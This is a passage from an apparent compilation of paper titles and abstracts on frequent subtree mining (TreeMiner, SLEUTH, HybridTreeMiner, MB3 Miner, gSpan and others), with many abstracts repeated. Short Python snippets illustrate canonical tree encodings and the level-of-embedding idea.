relatively mature association rule mining area. This paper provides an overview of a broad range of tree mining algorithms. We focus on the common theoretical foundations of the current frequent subtree mining algorithms and their relationship with their counterparts in frequent itemset mining. When comparing the algorithms, we categorize them according to their problem definitions and the techniques employed for solving various subtasks of the subtree mining problem. In addition, we also present a thorough performance study for a representative family of algorithms. --- paper_title: To see the wood for the trees: mining frequent tree patterns paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed recently. At the heart of these frameworks lies the notion of matching, which determines if a pattern tree matches a tree in a data set. We compare four notions of tree matching for use in frequent tree mining and show how they are related to each other. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted to employ three of the four notions of tree matching. Experiments on synthetic and real world data highlight the differences between the matchings. --- paper_title: Matching in frequent tree discovery paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed. At the heart of these frameworks lies the notion of matching, which determines when a pattern tree matches a tree in a data set. We introduce a notion of tree matching for use in frequent tree mining and we show that it generalizes the framework of Zaki while still being more specific than that of Termier et al. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted towards our notion of tree matching. Experiments show the promise of the approach. 
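Several of the abstracts above (HybridTreeMiner in particular) rely on a canonical form so that each unordered tree is enumerated exactly once. The sketch below is not the breadth-first canonical form (BFCF) itself but a common depth-first variant of the same idea, shown only as an illustration: children's canonical strings are sorted before concatenation, so any two isomorphic rooted labeled unordered trees receive the same encoding.

```python
def canonical_string(label, children):
    """Depth-first canonical string for a rooted labeled unordered tree.
    A tree is represented as (label, children), where children is a list of
    (label, children) pairs.  Sorting the recursively computed child strings
    makes the encoding independent of sibling order."""
    child_strings = sorted(canonical_string(l, c) for l, c in children)
    return "(" + label + "".join(child_strings) + ")"

# Two sibling orderings of the same unordered tree produce the same code.
t1 = ("A", [("B", []), ("C", [("D", [])])])
t2 = ("A", [("C", [("D", [])]), ("B", [])])
assert canonical_string(*t1) == canonical_string(*t2)
print(canonical_string(*t1))   # (A(B)(C(D)))
```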
--- paper_title: Discovering Frequent Agreement Subtrees from Phylogenetic Data paper_content: We study a new data mining problem concerning the discovery of frequent agreement subtrees (FASTs) from a set of phylogenetic trees. A phylogenetic tree, or phylogeny, is an unordered tree in which the order among siblings is unimportant. Furthermore, each leaf in the tree has a label representing a taxon (species or organism) name, whereas internal nodes are unlabeled. The tree may have a root, representing the common ancestor of all species in the tree, or may be unrooted. An unrooted phylogeny arises due to the lack of sufficient evidence to infer a common ancestor of the taxa in the tree. The FAST problem addressed here is a natural extension of the maximum agreement subtree (MAST) problem widely studied in the computational phylogenetics community. The paper establishes a framework for tackling the FAST problem for both rooted and unrooted phylogenetic trees using data mining techniques. We first develop a novel canonical form for rooted trees together with a phylogeny-aware tree expansion scheme for generating candidate subtrees level by level. Then, we present an efficient algorithm to find all FASTs in a given set of rooted trees, through an Apriori-like approach. We show the correctness and completeness of the proposed method. Finally, we discuss the extensions of the techniques to unrooted trees. Experimental results demonstrate that the proposed methods work well, and are capable of finding interesting patterns in both synthetic data and real phylogenetic trees. --- paper_title: Mining frequent patterns without candidate generation paper_content: Mining frequent patterns in transaction databases, time-series databases, and many other kinds of databases has been studied popularly in data mining research. Most of the previous studies adopt an Apriori-like candidate set generation-and-test approach. However, candidate set generation is still costly, especially when there exist prolific patterns and/or long patterns. In this study, we propose a novel frequent pattern tree (FP-tree) structure, which is an extended prefix-tree structure for storing compressed, crucial information about frequent patterns, and develop an efficient FP-tree-based mining method, FP-growth, for mining the complete set of frequent patterns by pattern fragment growth. Efficiency of mining is achieved with three techniques: (1) a large database is compressed into a highly condensed, much smaller data structure, which avoids costly, repeated database scans, (2) our FP-tree-based mining adopts a pattern fragment growth method to avoid the costly generation of a large number of candidate sets, and (3) a partitioning-based, divide-and-conquer method is used to decompose the mining task into a set of smaller tasks for mining confined patterns in conditional databases, which dramatically reduces the search space. Our performance study shows that the FP-growth method is efficient and scalable for mining both long and short frequent patterns, and is about an order of magnitude faster than the Apriori algorithm and also faster than some recently reported new frequent pattern mining methods. --- paper_title: Efficient data mining for maximal frequent subtrees paper_content: A new type of tree mining is defined, which uncovers maximal frequent induced subtrees from a database of unordered labeled trees. A novel algorithm, PathJoin, is proposed. 
The algorithm uses a compact data structure, FST-Forest, which compresses the trees and still keeps the original tree structure. PathJoin generates candidate subtrees by joining the frequent paths in FST-Forest. Such candidate subtree generation is localized and thus substantially reduces the number of candidate subtrees. Experiments with synthetic data sets show that the algorithm is effective and efficient. --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm, Unot, that computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unot discovers each frequent pattern T in O(kb^2 m) time per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: MB3 Miner: mining eMBedded sub-TREEs using Tree Model Guided candidate generation paper_content: Tree mining has many useful applications in areas such as Bioinformatics, XML mining, Web mining, etc. In general, most of the formally represented information in these domains is in a tree-structured form. In this paper we focus on mining frequent embedded subtrees from databases of rooted labeled ordered subtrees. We propose a novel and unique embedding list representation that is suitable for describing embedded subtrees. This representation is completely different from the string-like or conventional adjacency list representations previously utilized for trees. We present the mathematical model of a breadth-first-search Tree Model Guided (TMG) candidate generation approach previously introduced in [8]. The key characteristic of the TMG approach is that it enumerates fewer candidates by ensuring that only valid candidates that conform to the structural aspects of the data are generated, as opposed to the join approach. Our experiments with both synthetic and real-life datasets provide comparisons against one of the state-of-the-art algorithms, TreeMiner [15], and they demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually down to 1, at which point all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique.
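The IMB3-Miner abstract above introduces a Level of Embedding constraint that interpolates between embedded and induced subtree mining. The following is a hypothetical illustration (not the authors' data structures) of how that level might be measured for a single occurrence, given node depths and a mapping from pattern nodes to data tree nodes.

```python
def level_of_embedding(pattern_edges, occurrence, depth):
    """Illustrative check of the 'level of embedding' idea (not IMB3-Miner's
    implementation).  pattern_edges are (parent, child) pairs of pattern nodes,
    occurrence maps each pattern node to a data tree node, and depth gives each
    tree node's depth.  In an embedded occurrence every pattern edge maps to an
    ancestor-descendant pair; the level of embedding is the largest depth gap,
    and a level of 1 means the occurrence is in fact induced (parent-child)."""
    return max(depth[occurrence[c]] - depth[occurrence[p]]
               for p, c in pattern_edges)

# Data tree: r -> a -> b, with depths 0, 1, 2.  The pattern edge (X, Y) mapped
# to (r, b) skips node a, so the level of embedding is 2 (embedded, not induced).
depth = {"r": 0, "a": 1, "b": 2}
print(level_of_embedding([("X", "Y")], {"X": "r", "Y": "b"}, depth))  # 2
```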
--- paper_title: UNI3 - efficient algorithm for mining unordered induced subtrees using TMG candidate generation paper_content: Semi-structured data sources are increasingly in use today because of their capability of representing information through more complex structures where semantics and relationships of data objects are more easily expressed. Extraction of frequent sub-structures from such data has found important applications in areas such as Bioinformatics, XML mining, Web mining, scientific data management etc. This paper is concerned with the task of mining frequent unordered induced subtrees from a database of rooted ordered labeled subtrees. Our previous work in the area of frequent subtree mining is characterized by the efficient tree model guided (TMG) candidate enumeration, where candidate subtrees conform to the data's underlying tree structure. We apply the same approach to the unordered case, motivated by the fact that in many applications of frequent subtree mining the order among siblings is not considered important. The proposed UNI3 algorithm considers both transaction based and occurrence match support. Synthetic and real world data are used to evaluate the time performance of our approach in comparison to the well known algorithms developed for the same problem --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unotthat computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unotdiscovers each frequent pattern T in O(kb 2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: TRIPS and TIDES: new algorithms for tree mining paper_content: Recent research in data mining has progressed from mining frequent itemsets to more general and structured patterns like trees and graphs. In this paper, we address the problem of frequent subtree mining that has proven to be viable in a wide range of applications such as bioinformatics, XML processing, computational linguistics, and web usage mining. We propose novel algorithms to mine frequent subtrees from a database of rooted trees. We evaluate the use of two popular sequential encodings of trees to systematically generate and evaluate the candidate patterns. The proposed approach is very generic and can be used to mine embedded or induced subtrees that can be labeled, unlabeled, ordered, unordered, or edge-labeled. Our algorithms are highly cache-conscious in nature because of the compact and simple array-based data structures we use. Typically, L1 and L2 hit rates above 99% are observed. Experimental evaluation showed that our algorithms can achieve up to several orders of magnitude speedup on real datasets when compared to state-of-the-art tree mining algorithms. --- paper_title: Frequent Subtree Mining - An Overview paper_content: Mining frequent subtrees from databases of labeled trees is a new research field that has many practical applications in areas such as computer networks, Web mining, bioinformatics, XML document mining, etc. 
These applications share a requirement for the more expressive power of labeled trees to capture the complex relations among data entities. Although frequent subtree mining is a more difficult task than frequent itemset mining, most existing frequent subtree mining algorithms borrow techniques from the relatively mature association rule mining area. This paper provides an overview of a broad range of tree mining algorithms. We focus on the common theoretical foundations of the current frequent subtree mining algorithms and their relationship with their counterparts in frequent itemset mining. When comparing the algorithms, we categorize them according to their problem definitions and the techniques employed for solving various subtasks of the subtree mining problem. In addition, we also present a thorough performance study for a representative family of algorithms. --- paper_title: A quickstart in frequent structure mining can make a difference paper_content: Given a database, structure mining algorithms search for substructures that satisfy constraints such as minimum frequency, minimum confidence, minimum interest and maximum frequency. Examples of substructures include graphs, trees and paths. For these substructures many mining algorithms have been proposed. In order to make graph mining more efficient, we investigate the use of the "quickstart principle", which is based on the fact that these classes of structures are contained in each other, thus allowing for the development of structure mining algorithms that split the search into steps of increasing complexity. We introduce the GrAph/Sequence/Tree extractiON ( Gaston ) algorithm that implements this idea by searching first for frequent paths, then frequent free trees and finally cyclic graphs. We investigate two alternatives for computing the frequency of structures and present experimental results to relate these alternatives. --- paper_title: Mining Induced and Embedded Subtrees in Ordered, Unordered, and Partially-Ordered Trees paper_content: Many data mining problems can be represented with non-linear data structures like trees. In this paper, we introduce a scalable algorithm to mine partially-ordered trees. Our algorithm, POTMiner, is able to identify both induced and embedded subtrees and, as special cases, it can handle both completely ordered and completely unordered trees (i.e. the particular situations existing algorithms address). --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: To see the wood for the trees: mining frequent tree patterns paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed recently. 
At the heart of these frameworks lies the notion of matching, which determines if a pattern tree matches a tree in a data set. We compare four notions of tree matching for use in frequent tree mining and show how they are related to each other. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted to employ three of the four notions of tree matching. Experiments on synthetic and real world data highlight the differences between the matchings. --- paper_title: Efficiently Mining Frequent Embedded Unordered Trees paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semi-structured data, and so on. In this paper we introduce SLEUTH, an efficient algorithm for mining frequent, unordered, embedded subtrees in a database of labeled trees. The key contributions of our work are as follows: We give the first algorithm that enumerates all embedded, unordered trees. We propose a new equivalence class extension scheme to generate all candidate trees. We extend the notion of scope-list joins to compute frequency of unordered trees. We conduct performance evaluation on several synthetic and real datasets to show that SLEUTH is an efficient algorithm, which has performance comparable to TreeMiner, that mines only ordered trees. --- paper_title: Efficiently mining frequent trees in a forest paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semistructured data, and so on. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present T REE M INER , a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast T REE M INER with a pattern matching tree mining algorithm (P ATTERN M ATCHER ). We conduct detailed experiments to test the performance and scalability of these methods. We find that T REE M INER outperforms the pattern matching approach by a factor of 4 to 20, and has good scaleup properties. We also present an application of tree mining to analyze real web logs for usage patterns. --- paper_title: Discovering Frequent Agreement Subtrees from Phylogenetic Data paper_content: We study a new data mining problem concerning the discovery of frequent agreement subtrees (FASTs) from a set of phylogenetic trees. A phylogenetic tree, or phylogeny, is an unordered tree in which the order among siblings is unimportant. Furthermore, each leaf in the tree has a label representing a taxon (species or organism) name, whereas internal nodes are unlabeled. The tree may have a root, representing the common ancestor of all species in the tree, or may be unrooted. An unrooted phylogeny arises due to the lack of sufficient evidence to infer a common ancestor of the taxa in the tree. The FAST problem addressed here is a natural extension of the maximum agreement subtree (MAST) problem widely studied in the computational phylogenetics community. The paper establishes a framework for tackling the FAST problem for both rooted and unrooted phylogenetic trees using data mining techniques. We first develop a novel canonical form for rooted trees together with a phylogeny-aware tree expansion scheme for generating candidate subtrees level by level. Then, we present an efficient algorithm to find all FASTs in a given set of rooted trees, through an Apriori-like approach. We show the correctness and completeness of the proposed method. 
Finally, we discuss the extensions of the techniques to unrooted trees. Experimental results demonstrate that the proposed methods work well, and are capable of finding interesting patterns in both synthetic data and real phylogenetic trees. --- paper_title: AMIOT: induced ordered tree mining in tree-structured databases paper_content: Frequent subtree mining has become increasingly important in recent years. In this paper, we present AMIOT algorithm to discover all frequent ordered subtrees in a tree-structured database. In order to avoid the generation of infrequent candidate trees, we propose the techniques such as right-and-left tree join and serial tree extension. Proposed methods enumerate only the candidate trees with high probability of being frequent without any duplication. The experiments on synthetic dataset and XML database show that AMIOT reduces redundant candidate trees and outperforms FREQT algorithm by up to five times in execution time. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. 
--- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: MB3 Miner: mining eMBedded sub-TREEs using Tree Model Guided candidate generation paper_content: Tree mining has many useful applications in areas such as Bioinformatics, XML mining, Web mining, etc. In general, most of the formally represented information in these domains is a tree structured form. In this paper we focus on mining frequent embedded subtrees from databases of rooted labeled ordered subtrees. We propose a novel and unique embedding list representation that is suitable for describing embedded subtrees. This representation is completely different from the string-like or conventional adjacency list representation previously utilized for trees. We present the mathematical model of a breadth-first-search Tree Model Guided (TMG) candidate generation approach previously introduced in [8]. The key characteristic of the TMG approach is that it enumerates fewer candidates by ensuring that only valid candidates that conform to the structural aspects of the data are generated as opposed to the join approach. Our experiments with both synthetic and real-life datasets provide comparisons against one of the state-of-the-art algorithms, TreeMiner [15], and they demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. 
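TreeMiner and several related algorithms above operate on a flattened string encoding of labeled ordered trees: a depth-first traversal emits a node's label on the way down and a backtrack symbol (commonly written -1) when returning to its parent. A minimal sketch of that style of encoding, included only as an illustration rather than any algorithm's exact code:

```python
def preorder_encoding(label, children, backtrack="-1"):
    """Depth-first string encoding of a labeled ordered tree: emit a label when
    a node is first visited and a backtrack symbol when the traversal returns to
    its parent.  children is a list of (label, children) pairs."""
    out = [label]
    for child_label, child_children in children:
        out.extend(preorder_encoding(child_label, child_children, backtrack))
        out.append(backtrack)
    return out

# Ordered tree A(B, C(D)) encodes as: A B -1 C D -1 -1
tree = ("A", [("B", []), ("C", [("D", [])])])
print(" ".join(preorder_encoding(*tree)))
```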
--- paper_title: UNI3 - efficient algorithm for mining unordered induced subtrees using TMG candidate generation paper_content: Semi-structured data sources are increasingly in use today because of their capability of representing information through more complex structures where semantics and relationships of data objects are more easily expressed. Extraction of frequent sub-structures from such data has found important applications in areas such as Bioinformatics, XML mining, Web mining, scientific data management etc. This paper is concerned with the task of mining frequent unordered induced subtrees from a database of rooted ordered labeled subtrees. Our previous work in the area of frequent subtree mining is characterized by the efficient tree model guided (TMG) candidate enumeration, where candidate subtrees conform to the data's underlying tree structure. We apply the same approach to the unordered case, motivated by the fact that in many applications of frequent subtree mining the order among siblings is not considered important. The proposed UNI3 algorithm considers both transaction based and occurrence match support. Synthetic and real world data are used to evaluate the time performance of our approach in comparison to the well known algorithms developed for the same problem --- paper_title: Mining frequent patterns without candidate generation paper_content: Mining frequent patterns in transaction databases, time-series databases, and many other kinds of databases has been studied popularly in data mining research. Most of the previous studies adopt an Apriori-like candidate set generation-and-test approach. However, candidate set generation is still costly, especially when there exist prolific patterns and/or long patterns. In this study, we propose a novel frequent pattern tree (FP-tree) structure, which is an extended prefix-tree structure for storing compressed, crucial information about frequent patterns, and develop an efficient FP-tree-based mining method, FP-growth, for mining the complete set of frequent patterns by pattern fragment growth. Efficiency of mining is achieved with three techniques: (1) a large database is compressed into a highly condensed, much smaller data structure, which avoids costly, repeated database scans, (2) our FP-tree-based mining adopts a pattern fragment growth method to avoid the costly generation of a large number of candidate sets, and (3) a partitioning-based, divide-and-conquer method is used to decompose the mining task into a set of smaller tasks for mining confined patterns in conditional databases, which dramatically reduces the search space. Our performance study shows that the FP-growth method is efficient and scalable for mining both long and short frequent patterns, and is about an order of magnitude faster than the Apriori algorithm and also faster than some recently reported new frequent pattern mining methods. --- paper_title: Efficient data mining for maximal frequent subtrees paper_content: A new type of tree mining is defined, which uncovers maximal frequent induced subtrees from a database of unordered labeled trees. A novel algorithm, PathJoin, is proposed. The algorithm uses a compact data structure, FST-Forest, which compresses the trees and still keeps the original tree structure. PathJoin generates candidate subtrees by joining the frequent paths in FST-Forest. Such candidate subtree generation is localized and thus substantially reduces the number of candidate subtrees. 
Experiments with synthetic data sets show that the algorithm is effective and efficient. --- paper_title: Genome-scale disk-based suffix tree indexing paper_content: With the exponential growth of biological sequence databases, it has become critical to develop effective techniques for storing, querying, and analyzing these massive data. Suffix trees are widely used to solve many sequence-based problems, and they can be built in linear time and space, provided the resulting tree fits in main-memory. To index larger sequences, several external suffix tree algorithms have been proposed in recent years. However, they suffer from several problems such as susceptibility to data skew, non-scalability to genome-scale sequences, and non-existence of suffix links, which are crucial in various suffix tree based algorithms. In this paper, we target DNA sequences and propose a novel disk-based suffix tree algorithm called TRELLIS, which effectively scales up to genome-scale sequences. Specifically, it can index the entire human genome using 2GB of memory, in about 4 hours and can recover all its suffix links within 2 hours. TRELLIS was compared to various state-of-the-art persistent disk-based suffix tree construction algorithms, and was shown to outperform the best previous methods, both in terms of indexing time and querying time. --- paper_title: Practical methods for constructing suffix trees paper_content: Sequence datasets are ubiquitous in modern life-science applications, and querying sequences is a common and critical operation in many of these applications. The suffix tree is a versatile data structure that can be used to evaluate a wide variety of queries on sequence datasets, including evaluating exact and approximate string matches, and finding repeat patterns. However, methods for constructing suffix trees are often very time-consuming, especially for suffix trees that are large and do not fit in the available main memory. Even when the suffix tree fits in memory, it turns out that the processor cache behavior of theoretically optimal suffix tree construction methods is poor, resulting in poor performance. Currently, there are a large number of algorithms for constructing suffix trees, but the practical tradeoffs in using these algorithms for different scenarios are not well characterized.In this paper, we explore suffix tree construction algorithms over a wide spectrum of data sources and sizes. First, we show that on modern processors, a cache-efficient algorithm with O(n2) worst-case complexity outperforms popular linear time algorithms like Ukkonen and McCreight, even for in-memory construction. For larger datasets, the disk I/O requirement quickly becomes the bottleneck in each algorithm's performance. To address this problem, we describe two approaches. First, we present a buffer management strategy for the O(n2) algorithm. The resulting new algorithm, which we call “Top Down Disk-based” (TDD), scales to sizes much larger than have been previously described in literature. This approach far outperforms the best known disk-based construction methods. Second, we present a new disk-based suffix tree construction algorithm that is based on a sort-merge paradigm, and show that for constructing very large suffix trees with very little resources, this algorithm is more efficient than TDD. --- paper_title: AMIOT: induced ordered tree mining in tree-structured databases paper_content: Frequent subtree mining has become increasingly important in recent years. 
In this paper, we present AMIOT algorithm to discover all frequent ordered subtrees in a tree-structured database. In order to avoid the generation of infrequent candidate trees, we propose the techniques such as right-and-left tree join and serial tree extension. Proposed methods enumerate only the candidate trees with high probability of being frequent without any duplication. The experiments on synthetic dataset and XML database show that AMIOT reduces redundant candidate trees and outperforms FREQT algorithm by up to five times in execution time. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unotthat computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unotdiscovers each frequent pattern T in O(kb 2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. 
The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: gSpan: graph-based substructure pattern mining paper_content: We investigate new approaches for frequent graph-based pattern mining in graph datasets and propose a novel algorithm called gSpan (graph-based substructure pattern mining), which discovers frequent substructures without candidate generation. gSpan builds a new lexicographic order among graphs, and maps each graph to a unique minimum DFS code as its canonical label. Based on this lexicographic order gSpan adopts the depth-first search strategy to mine frequent connected subgraphs efficiently. Our performance study shows that gSpan substantially outperforms previous algorithms, sometimes by an order of magnitude. --- paper_title: Indexing and mining free trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, computer networks, and so on. We present an indexing technique for free trees and apply this indexing technique to the problem of mining frequent subtrees. We first define a novel representation, the canonical form, for rooted trees and extend the definition to free trees. We also introduce another concept, the canonical string, as a simpler representation for free trees in their canonical forms. We then apply our tree indexing technique to the frequent subtree mining problem and present FreeTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of free trees. We study the performance and the scalability of our algorithms through extensive experiments based on both synthetic data and datasets from two real applications: a dataset of chemical compounds and a dataset of Internet multicast trees. --- paper_title: A quickstart in frequent structure mining can make a difference paper_content: Given a database, structure mining algorithms search for substructures that satisfy constraints such as minimum frequency, minimum confidence, minimum interest and maximum frequency. Examples of substructures include graphs, trees and paths. For these substructures many mining algorithms have been proposed. In order to make graph mining more efficient, we investigate the use of the "quickstart principle", which is based on the fact that these classes of structures are contained in each other, thus allowing for the development of structure mining algorithms that split the search into steps of increasing complexity. We introduce the GrAph/Sequence/Tree extractiON ( Gaston ) algorithm that implements this idea by searching first for frequent paths, then frequent free trees and finally cyclic graphs. We investigate two alternatives for computing the frequency of structures and present experimental results to relate these alternatives. --- paper_title: Frequent free tree discovery in graph data paper_content: In recent years, researchers in graph mining have been exploring linear paths as well as subgraphs as pattern languages. In this paper, we are investigating the middle ground between these two extremes: mining free (that is, unrooted) trees in graph data. The motivation for this is the need to upgrade linear path patterns, while avoiding complexity issues with subgraph patterns. 
Starting from such complexity considerations, we are defining free trees and their canonical form, before we present FreeTreeMiner, an algorithm making efficient use of this canonical form during search. Experiments with two datasets from the National Cancer Institute's Developmental Therapeutics Program (DTP), anti-HIV and anti-cancer screening data, are reported. --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: MB3 Miner: mining eMBedded sub-TREEs using Tree Model Guided candidate generation paper_content: Tree mining has many useful applications in areas such as Bioinformatics, XML mining, Web mining, etc. In general, most of the formally represented information in these domains is a tree structured form. In this paper we focus on mining frequent embedded subtrees from databases of rooted labeled ordered subtrees. We propose a novel and unique embedding list representation that is suitable for describing embedded subtrees. This representation is completely different from the string-like or conventional adjacency list representation previously utilized for trees. We present the mathematical model of a breadth-first-search Tree Model Guided (TMG) candidate generation approach previously introduced in [8]. The key characteristic of the TMG approach is that it enumerates fewer candidates by ensuring that only valid candidates that conform to the structural aspects of the data are generated as opposed to the join approach. Our experiments with both synthetic and real-life datasets provide comparisons against one of the state-of-the-art algorithms, TreeMiner [15], and they demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. 
